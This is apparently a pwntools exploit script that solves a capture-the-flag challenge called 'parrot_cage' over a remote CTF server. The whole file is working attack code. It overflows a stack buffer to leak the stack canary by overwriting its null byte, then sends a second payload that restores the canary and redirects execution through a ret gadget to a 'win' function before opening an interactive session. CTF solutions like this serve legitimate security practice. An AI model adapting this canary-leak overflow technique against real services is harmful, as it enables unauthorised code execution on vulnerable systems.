#!/usr/bin/env python3
from pwn import *

elf = context.binary = ELF('./parrot_cage', checksec=False)

OFFSET_TO_CANARY = 72
#OFFSET_TO_RIP = 88

#p = process(elf.path)
p = remote('offsec.m0lecon.it',13531)
print(p.recvline())
print(p.recvline())
print(p.recvline())
print(p.recvline())
#print(p.recvline())
#print(p.recvuntil(b'chatting\n'))
#p.send(b"A"*30+b'\x00'+b"B"*30)
#For the future: the first byte in the canary is \x00, so I need
# to overwrite it in order to print the canary
payload = flat(
    #b'\x00',
    b"A" * (OFFSET_TO_CANARY+1),
    #b'\x00',
    #p64(canary),
    #b"B"  * 30,
    #b"B" * ( OFFTSET_TO_RIP - OFFSET_TO_CANARY - 8),
    #p64(win_addr),
)
p.send(payload)
p.recvline()

#add the missing 00 byte and convert to int
canary_raw = b'\x00'+p.recvline()[(OFFSET_TO_CANARY+1):OFFSET_TO_CANARY+1+7].strip()
print(canary_raw)
canary = int.from_bytes(canary_raw, byteorder='little')
print(f"Canary:{p64(canary)}")
payload = flat(
    b'A'* OFFSET_TO_CANARY,
    p64(canary),
    b'B' * 8, #RBP
    p64(0x000000000040101a), #gadget
    p64(0x0000000000401236), #win
)
p.send(payload)
p.sendline(b'bye')
print(p.recvline())
#print(p.recvline())
p.interactive()
#print(b"Recv "+p.recvline())
#print(p.recvline())

"""p.send(payload)
p.sendline(b'bye')
p.interactive()"""